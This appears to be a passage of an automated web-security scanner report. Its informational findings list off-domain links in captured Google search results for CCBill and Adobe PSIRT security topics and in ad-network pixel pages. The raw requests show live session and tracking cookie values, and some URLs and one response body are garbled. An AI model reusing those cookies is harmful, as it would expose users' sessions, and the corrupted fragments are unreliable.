...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:GxlGRoyWGSAJ:www.first.org/members/teams/adobe_psirt/+adobe+psirt&cd=7.PPc!l...E4QIDAG')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:umLbkOmqYiIJ:tna.europarchive.org/20110106102426/blogs.adobe.com/psirt/+adobe+psirt&cd=8.PP3!.;..eFQQIDAH')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Ku6IsruuA4cJ:www.infosecblog.org/2009/06/adobe-psirt-advance-notice-of-adobe-acrobatreader-updates/+adobe+psirt&cd=9.PPC!.C..}FoQIDAI')">Cached</a>
...[SNIP]...

16.15. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ccbill+vulnerability+rewards

The response contains the following links to other domains:

http://cheatingnetwork.net/forums/chit-chat/58321-ccbill-exploit.html
http://hackerne.ws/item?id=2657003
http://news.ycombinator.com/item?id=2657255
http://seclists.org/fulldisclosure/2010/Aug/188
http://they95.wordpress.com/2009/08/02/carding-with-ccbill/
http://webcache.googleusercontent.com/search?q=cache:3ZWPARguoEMJ:they95.wordpress.com/2009/08/02/carding-with-ccbill/+ccbill+vulnerability+rewards&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:64dssPRrKq0J:news.ycombinator.com/item%3Fid%3D2657255+ccbill+vulnerability+rewards&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:AJOixy3v0jkJ:hackerne.ws/item%3Fid%3D2657003+ccbill+vulnerability+rewards&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:OsnHAxstqkoJ:cheatingnetwork.net/forums/chit-chat/58321-ccbill-exploit.html+ccbill+vulnerability+rewards&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PcqTwhC4qkYJ:https://www.ccbill.com/developers/security/vulnerability-reward-registration.php+ccbill+vulnerability+rewards&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:WePknlC3FOkJ:www.reddit.com/r/xss/comments/hksny/ccbillcom_vulnerability_reward_program/+ccbill+vulnerability+rewards&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:XzPJ1qKcgeMJ:www.multibill.com/index.php%3Fu%3DOi8vd3d3LmNjYmlsbC5jb20vY3MvY2xpZW50L3BvbGljaWVzL2NjYmlsbC9jY192cnAuaHRt%26b%3D9+ccbill+vulnerability+rewards&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:_ub9apCZqpMJ:www.ccbill.com/developers/security/vulnerability-reward-program-participation.php+ccbill+vulnerability+rewards&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ydtK86xfCh0J:www.ccbill.com/developers/security/vulnerability-reward-program.php+ccbill+vulnerability+rewards&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php
http://www.ccbill.com/developers/security/vulnerability-reward-program.php
http://www.multibill.com/index.php?u=Oi8vd3d3LmNjYmlsbC5jb20vY3MvY2xpZW50L3BvbGljaWVzL2NjYmlsbC9jY192cnAuaHRt&b=9
http://www.reddit.com/r/xss/comments/hksny/ccbillcom_vulnerability_reward_program/
http://www.youtube.com/results?q=ccbill+vulnerability+rewards&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
https://www.ccbill.com/developers/security/vulnerability-reward-registration.php

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ccbill+vulnerability+rewards HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:03:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 90546

<!doctype html> <head> <title>ccbill vulnerability rewards - Google Search</title> <script>window.google={kEI:"f34cTrfUI_C40AGbkaXCBw",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,297
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=ccbill+vulnerability+rewards&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php" class=l onmousedown="return clk(this.href,'','','','1','','0CBgQFjAA')">Online Merchant Services for Payment Processing | <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_ub9apCZqpMJ:www.ccbill.com/developers/security/vulnerability-reward-program-participation.php+ccbill+vulnerability+rewards&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="https://www.ccbill.com/developers/security/vulnerability-reward-registration.php" class=l onmousedown="return clk(this.href,'','','','2','','0CB4QFjAB')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:PcqTwhC4qkYJ:https://www.ccbill.com/developers/security/vulnerability-reward-registration.php+ccbill+vulnerability+rewards&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCMQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ccbill.com/developers/security/vulnerability-reward-program.php" class=l onmousedown="return clk(this.href,'','','','3','','0CCQQFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ydtK86xfCh0J:www.ccbill.com/developers/security/vulnerability-reward-program.php+ccbill+vulnerability+rewards&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCkQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.multibill.com/index.php?u=Oi8vd3d3LmNjYmlsbC5jb20vY3MvY2xpZW50L3BvbGljaWVzL2NjYmlsbC9jY192cnAuaHRt&b=9" class=l onmousedown="return clk(this.href,'','','','4','','0CCsQFjAD')">MultiBill Client Terms and Conditions</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:XzPJ1qKcgeMJ:www.multibill.com/index.php%3Fu%3DOi8vd3d3LmNjYmlsbC5jb20vY3MvY2xpZW50L3BvbGljaWVzL2NjYmlsbC9jY192cnAuaHRt%26b%3D9+ccbill+vulnerability+rewards&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:XzPJ1qKcgeMJ:www.multibill.com/index.php%3Fu%3DOi8vd3d3LmNjYmlsbC5jb20vY3MvY2xpZW50L3BvbGljaWVzL2NjYmlsbC9jY192cnAuaHRt%26b%3D9+ccbill+vulnerability+rewards&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com','','','','4','','0CDAQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.reddit.com/r/xss/comments/hksny/ccbillcom_vulnerability_reward_program/" class=l onmousedown="return clk(this.href,'','','','5','','0CDEQFjAE')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:WePknlC3FOkJ:www.reddit.com/r/xss/comments/hksny/ccbillcom_vulnerability_reward_program/+ccbill+vulnerability+rewards&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDYQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://news.ycombinator.com/item?id=2657255" class=l onmousedown="return clk(this.href,'','','','6','','0CDcQFjAF')">Hacker News | Eh I dunno. Google does this with its <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:64dssPRrKq0J:news.ycombinator.com/item%3Fid%3D2657255+ccbill+vulnerability+rewards&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:64dssPRrKq0J:news.ycombinator.com/item%3Fid%3D2657255+ccbill+vulnerability+rewards&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com','','','','6','','0CDwQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://hackerne.ws/item?id=2657003" class=l onmousedown="return clk(this.href,'','','','7','','0CD0QFjAG')">Hacker News | I imagine that publicizing a web <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:AJOixy3v0jkJ:hackerne.ws/item%3Fid%3D2657003+ccbill+vulnerability+rewards&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:AJOixy3v0jkJ:hackerne.ws/item%3Fid%3D2657003+ccbill+vulnerability+rewards&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CEIQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://seclists.org/fulldisclosure/2010/Aug/188" class=l onmousedown="return clk(this.href,'','','','8','','0CEMQFjAH')">Re: <em>
...[SNIP]...
<h3 class="r"><a href="http://cheatingnetwork.net/forums/chit-chat/58321-ccbill-exploit.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEgQFjAI')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:OsnHAxstqkoJ:cheatingnetwork.net/forums/chit-chat/58321-ccbill-exploit.html+ccbill+vulnerability+rewards&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CE0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://they95.wordpress.com/2009/08/02/carding-with-ccbill/" class=l onmousedown="return clk(this.href,'','','','10','','0CE8QFjAJ')">Carding with <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:3ZWPARguoEMJ:they95.wordpress.com/2009/08/02/carding-with-ccbill/+ccbill+vulnerability+rewards&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFQQIDAJ')">Cached</a>
...[SNIP]...

16.16. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt+web+server+security

The response contains the following links to other domains:

http://webcache.googleusercontent.com/search?q=cache:0OXWXdb086oJ:blogs.adobe.com/psirt/2009/09/update_on_robohelp_server_8_is.html+adobe+psirt+web+server+security&cd=1CP..3!...-CAQIDAA')
http://webcache.googleusercontent.com/search?q=cache:D-Gt97uVIWEJ:blogs.adobe.com/psirt/tag/robohelp-server+adobe+psirt+web+server+security&cd=3.PPc!....,C0QIDAC')
http://webcache.googleusercontent.com/search?q=cache:EYrD87WEDE4J:www.wizcrafts.net/blogs/vulnerability_alerts/+adobe+psirt+web+server+security&cd=8.PPS!.;..tEwQIDAH')
http://webcache.googleusercontent.com/search?q=cache:FXT3gN01M-0J:blogs.adobe.com/psirt/category/uncategorized/page/3+adobe+psirt+web+server+security&cd=4.PPC!....BDMQIDAD')
http://webcache.googleusercontent.com/search?q=cache:ZGmlMQzBY2sJ:www.iss.net/security_center/reference/vuln/Multimedia_File_Overflow.htm+adobe+psirt+web+server+security&cd=9.PPc!.C.-FIQIDAI')
http://webcache.googleusercontent.com/search?q=cache:_4VaF5FysqoJ:blogs.adobe.com/psirt/2009/12+adobe+psirt+web+server+security&cd=2.PPC!.z..<CcQIDAB')
http://webcache.googleusercontent.com/search?q=cache:bN7kP15Zs9EJ:webarchive.nationalarchives.gov.uk/20110202131614/blogs.adobe.com/psirt/category/security-bulletins-and-advisories%253Fpromoid%253Dhrycp+adobe+psirt+web+server+security&cd=6.PP..tclk('http://webcache.googleusercontent.com/search?q=cache:bN7kP15Zs9EJ:webarchive.nationalarchives.gov.uk/20110202131614/blogs.adobe.com/psirt/category/security-bulletins-and-advisories%253Fpromoid%253Dhrycp+adobe+psirt+web+server+security&cd=6.6...'6','','0CEAQIDAF')
http://webcache.googleusercontent.com/search?q=cache:juQ1U4IxUw8J:isc.incidents.org/diary/Skipfish%2B-%2BWeb%2BApplication%2BSecurity%2BTool/diary.html%3Fstoryid%3D10876+adobe+psirt+web+server+security3Y....Sclk('http://webcache.googleusercontent.com/search?q=cache:juQ1U4IxUw8J:isc.incidents.org/diary/Skipfish%2B-%2BWeb%2BApplication%2BSecurity%2BTool/diary.html%3Fstoryid%3D10876+adobe+psirt+web+server+security&cd=5S6.:...5','','0CDoQIDAE')
http://webcache.googleusercontent.com/search?q=cache:p0vOQFv8LGgJ:macromediastudio.biz/uk/security/psirt/+adobe+psirt+web+server+security&cd=10.PPc

Request

GET /search?sourceid=chrome&ie=UTF-8&q=adobe+psirt+web+server+security HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:41:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 43187

ShjDd-Or....S....L...q.......c.....Ds#...adobe psirt web server security.7%..kXLEcTsSJGarc0QGL8Pn8Bw",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,29702,29859,30316,30465,31116,31259,31303,3
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:0OXWXdb086oJ:blogs.adobe.com/psirt/2009/09/update_on_robohelp_server_8_is.html+adobe+psirt+web+server+security&cd=1CP..3!...-CAQIDAA')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_4VaF5FysqoJ:blogs.adobe.com/psirt/2009/12+adobe+psirt+web+server+security&cd=2.PPC!.z..<CcQIDAB')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:D-Gt97uVIWEJ:blogs.adobe.com/psirt/tag/robohelp-server+adobe+psirt+web+server+security&cd=3.PPc!....,C0QIDAC')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:FXT3gN01M-0J:blogs.adobe.com/psirt/category/uncategorized/page/3+adobe+psirt+web+server+security&cd=4.PPC!....BDMQIDAD')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:juQ1U4IxUw8J:isc.incidents.org/diary/Skipfish%2B-%2BWeb%2BApplication%2BSecurity%2BTool/diary.html%3Fstoryid%3D10876+adobe+psirt+web+server+security3Y....Sclk('http://webcache.googleusercontent.com/search?q=cache:juQ1U4IxUw8J:isc.incidents.org/diary/Skipfish%2B-%2BWeb%2BApplication%2BSecurity%2BTool/diary.html%3Fstoryid%3D10876+adobe+psirt+web+server+security&cd=5S6.:...5','','0CDoQIDAE')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:bN7kP15Zs9EJ:webarchive.nationalarchives.gov.uk/20110202131614/blogs.adobe.com/psirt/category/security-bulletins-and-advisories%253Fpromoid%253Dhrycp+adobe+psirt+web+server+security&cd=6.PP..tclk('http://webcache.googleusercontent.com/search?q=cache:bN7kP15Zs9EJ:webarchive.nationalarchives.gov.uk/20110202131614/blogs.adobe.com/psirt/category/security-bulletins-and-advisories%253Fpromoid%253Dhrycp+adobe+psirt+web+server+security&cd=6.6...'6','','0CEAQIDAF')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:EYrD87WEDE4J:www.wizcrafts.net/blogs/vulnerability_alerts/+adobe+psirt+web+server+security&cd=8.PPS!.;..tEwQIDAH')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ZGmlMQzBY2sJ:www.iss.net/security_center/reference/vuln/Multimedia_File_Overflow.htm+adobe+psirt+web+server+security&cd=9.PPc!.C.-FIQIDAI')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:p0vOQFv8LGgJ:macromediastudio.biz/uk/security/psirt/+adobe+psirt+web+server+security&cd=10.PPc".f..@FkQIDAJ')">Cached</a>
...[SNIP]...

16.17. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=1270268;dcnet=4155;boom=23992;sz=1x1;ord=1310503209?
http://ad.trafficmp.com/a/bpix?adv=598&id=175&r=&rnd=1310503209
http://bstats.adbrite.com/click/bstats.gif?kid=44122220&bapid=4841&uid=613938
http://idcs.interclick.com/Segment.aspx?sid=51779f5a-8ca5-4395-b9fa-56d4728d8d30&cacheBust=1310503209
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=landsend2_cs=1&betq=11806=425772nc=1310503209?
http://pixel.mathtag.com/data/img?mt_id=100037&mt_dcid=1310503209
http://pixel.rubiconproject.com/tap.php?v=3580&cb=1310503209
http://r.turn.com/r/beacon?b2=FByeuAXqkHhXOiTks1_RDHuyv5J3SwZiRg78Z1NxLyb4gb0R5BD6tgrwYZO8aErV6qi95ZYyYuk6jhVvr5n4LQ&cid=&bprice=&rnd=1310503209
http://tag.admeld.com/pixel?admeld_adprovider_id=55&custom_segment=1&r=1310503209
http://www.googleadservices.com/pagead/conversion/1040696757/?label=vVzoCKWWiQIQtYuf8AM&guid=ON&script=0

Request

GET /cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA; YU=3e170243b30558bee730f315249abaeb-5OYl5; CH=32766,00000,36067,00000,34637,00000,24785,53c27,18661,53bro,18654,53bro,37746,5MfXs,33114,00000,18653,53bro,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,34030,00000,30627,00000,28882,5OYlT,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYlT,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,24782,53c27,19037,58T8w,34604,00000,28873,5OYlT,34698,00000,34506,00000; RQ=3151,57rv5,3173,5OYlT,3190,53c1h,3238,5OYlT,3281,5JD0W,3677,5OYlT,3678,5OYlT,3754,5OYl5,3763,5JCcZ,1267,53br0,2831,5OYl5,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,5OYlT,2887,53br0,3468,53br2,985,5OYl5,1445,5OYl5,1470,5OYlT,1478,5OYl5,1513,5OYl5,1514,5OYlT,1515,5OYl5,2398,5OYlT,2570,53c1h,1042,58T8w,1182,58T8w,1271,5OYlT,1273,5OYlT,1286,58T8w,1339,58T8w,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,58T8w,3491,5JDlu,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 1602
Connection: close
Set-Cookie: CH=32766,00000,36067,00000,34637,00000,24785,53c27,18661,53bro,18654,53bro,37746,5MfXs,33114,00000,18653,53bro,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,34030,00000,30627,00000,28882,5OYll,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYll,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,24782,53c27,19037,58T8w,34604,00000,28873,5OYll,34698,00000,34506,00000; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:02:26 GMT
Set-Cookie: RQ=3151,57rv5,3173,5OYlT,3190,5OYll,3238,5OYlT,3281,5JD0W,3677,5OYlT,3678,5OYlT,3754,5OYl5,3763,5OYll,1267,5OYll,2831,5OYl5,2848,5OYll,2849,5OYll,2852,5OYll,2850,5OYll,2888,53br2,2890,5OYll,2921,5OYlT,2887,5OYll,3468,53br2,985,5OYl5,1445,5OYl5,1470,5OYlT,1478,5OYl5,1513,5OYl5,1514,5OYlT,1515,5OYl5,2398,5OYlT,2570,5OYll,1042,5OYll,1182,5OYll,1271,5OYlT,1273,5OYlT,1286,5OYll,1339,5OYll,1909,5OYl5,2170,5OYll,1211,5OYl5,2739,5OYll,3218,5OYll,3246,5JCyZ,3425,5OYll,3491,5JDlu,3387,5OYll,3388,5OYll,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:02:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://ad.trafficmp.com/a/bpix?adv=598&id=175&r=&rnd=1310503209" alt="" border="0" width="1" height="1">
<img src="http://idcs.interclick.com/Segment.aspx?sid=51779f5a-8ca5-4395-b9fa-56d4728d8d30&cacheBust=1310503209" alt="" border="0" width="1" height="1">
<img src="http://pixel.rubiconproject.com/tap.php?v=3580&cb=1310503209" alt="" border="0" width="1" height="1">
<img src="http://r.turn.com/r/beacon?b2=FByeuAXqkHhXOiTks1_RDHuyv5J3SwZiRg78Z1NxLyb4gb0R5BD6tgrwYZO8aErV6qi95ZYyYuk6jhVvr5n4LQ&cid=&bprice=&rnd=1310503209" alt="" border="0" width="1" height="1">
<img src="http://bstats.adbrite.com/click/bstats.gif?kid=44122220&bapid=4841&uid=613938" alt="" border="0" width="1" height="1">
<img src="http://pixel.mathtag.com/data/img?mt_id=100037&mt_dcid=1310503209" alt="" border="0" width="1" height="1">
<img src="http://www.googleadservices.com/pagead/conversion/1040696757/?label=vVzoCKWWiQIQtYuf8AM&amp;guid=ON&amp;script=0" alt="" border="0" width="1" height="1">
<img src="http://ad.doubleclick.net/activity;src=1270268;dcnet=4155;boom=23992;sz=1x1;ord=1310503209?" alt="" border="0" width="1" height="1">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=landsend2_cs=1&betq=11806=425772nc=1310503209?" alt="" border="0" width="1" height="1">
<img src="http://tag.admeld.com/pixel?admeld_adprovider_id=55&custom_segment=1&r=1310503209" alt="" border="0" width="1" height="1"></body>
...[SNIP]...

16.18. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=25222;sz=1x1;ord=1310503191?
http://ad.trafficmp.com/a/bpix?adv=598&id=43&r=&rnd=1310503191
http://at.amgdgt.com/ads/?t=pp&px=6805&rnd=1310503191
http://bstats.adbrite.com/click/bstats.gif?kid=47018554&bapid=9470
http://idcs.interclick.com/Segment.aspx?sid=df95ac7c-6207-43ad-993e-32c0dcb073e2&cacheBust=1310503191
http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1310503191
http://pixel.mathtag.com/data/img?mt_id=100036&mt_dcid=1310503191
http://pixel.rubiconproject.com/d.php?v=1224_1&cb=1310503191
http://r.turn.com/r/beacon?b2=XQJXoc3GXJl4C2OPaUWM7iAtM36VAFfKNtiRjH8FDumizyRr3ZDS0kVs9n6J_dLRq_NW3YM2poGhXMGhfdiF5g&cid=&bprice=&rnd=1310503191
http://www.burstnet.com/enlightn/5158/2CB4/?1310503191

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 20:39:51 GMT
Content-Length: 1473
Connection: close
Set-Cookie: CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYlT,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYlT,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYlT,34698,00000,34506,00000; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT
Set-Cookie: RQ=3763,5JCcZ,3151,57rv5,3173,5OYlT,3190,5OYlT,3238,5OYlT,3281,5JD0W,3677,5OYlT,3678,5OYlT,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,5OYlT,1478,5OYl5,1513,5OYl5,1514,5OYlT,1515,5OYl5,2398,5OYlT,2570,5OYlT,1267,53br0,2831,5OYl5,2848,5OYlT,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,5OYlT,2921,5OYlT,2887,53br0,3468,53br2,1042,5OYlT,1182,5OYlT,1271,5OYlT,1273,5OYlT,1286,5OYlT,1339,5OYlT,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,5OYlT,3491,5JDlu,3387,5OYlT,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://ad.trafficmp.com/a/bpix?adv=598&id=43&r=&rnd=1310503191" alt="" border="0" width="1" height="1">
<img src="http://www.burstnet.com/enlightn/5158//2CB4/?1310503191" alt="" border="0" width="1" height="1">
<img src="http://idcs.interclick.com/Segment.aspx?sid=df95ac7c-6207-43ad-993e-32c0dcb073e2&cacheBust=1310503191" alt="" border="0" width="1" height="1">
<img src="http://at.amgdgt.com/ads/?t=pp&px=6805&rnd=1310503191" alt="" border="0" width="1" height="1">
<img src="http://pixel.rubiconproject.com/d.php?v=1224_1&cb=1310503191" alt="" border="0" width="1" height="1">
